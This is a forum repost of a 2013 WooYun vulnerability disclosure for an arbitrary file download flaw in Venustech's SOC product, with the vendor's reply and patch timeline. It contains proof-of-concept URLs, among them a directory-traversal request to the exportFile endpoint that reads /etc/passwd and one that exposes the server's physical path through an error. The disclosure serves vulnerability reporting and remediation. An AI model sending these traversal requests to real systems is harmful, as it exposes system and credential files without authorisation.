‹‹ 上一主题 | 下一主题 ››
发新话题
打印

启明星辰SOC任意文件下载漏洞

linda

琳达

版主

Rank: 7Rank: 7Rank: 7
1# 发表于 2014-12-26 12:12  只看该作者

启明星辰SOC任意文件下载漏洞

漏洞概要
缺陷编号:        WooYun-2013-24296漏洞标题:        启明星辰SOC任意文件下载漏洞
相关厂商:        北京启明星辰信息安全技术有限公司
漏洞作者:        piaox
提交时间:        2013-05-23 01:07
公开时间:        2013-08-21 01:07
漏洞类型:        任意文件遍历/下载
危害等级:        高
自评Rank:        10
漏洞状态:        厂商已经确认
漏洞来源:        http://www.wooyun.org
Tags标签:       任意文件遍历下载

漏洞详情披露状态:
2013-05-23:        细节已通知厂商并且等待厂商处理中
2013-05-23:        厂商已经确认,细节仅向厂商公开
2013-05-26:        细节向第三方安全合作伙伴开放
2013-06-02:        细节向核心白帽子及相关领域专家公开
2013-06-12:        细节向普通白帽子公开
2013-07-02:        细节向实习白帽子公开
2013-08-21:        细节向公众公开

简要描述:启明星辰soc在导出交换机syslog配置模板时过滤不严,导致任意文件下载
详细说明:(1)、下载huawei.switch.xml

http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Huawei.Switch.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=/2network

(2)、下载dell.force10.switch.xml

http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Dell.Force10.Switch.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=/2network

其中
code 区域eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==这段为固定base64,没什么影响。

(3)、报错暴露出真实物理路径

http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Netflow.v5.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=../

SOC抛错处理不当:





得出物理路径


漏洞证明:http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=passwd&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=/../../../../../../../etc








修复方案:你们是专家
版权声明:转载请注明来源 piaox@乌云

漏洞回应
厂商回应:危害等级:中
漏洞Rank:10
确认时间:2013-05-23 11:24
厂商回复:感谢!我们正在处理。
最新状态:2013-06-09:5月24日:针对该漏洞,内部发布了《应急响应方案》,为客户提供应急处置。 5月29日:针对该漏洞的第一批补丁包发布。 6月5日:经过修复,针对该安全漏洞的所有补丁包已经在6月5日正式发布。最终客户可以联系与之接口的启明星辰公司商务和技术人员获取相关补丁包。

原文:http://www.wooyun.org/bugs/wooyun-2010-024296

[ 本帖最后由 linda 于 2016-2-3 17:43 编辑 ]

搜索更多相关主题的帖子: 启明星辰 SOC 非授权访问 文件下载 密码泄露

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题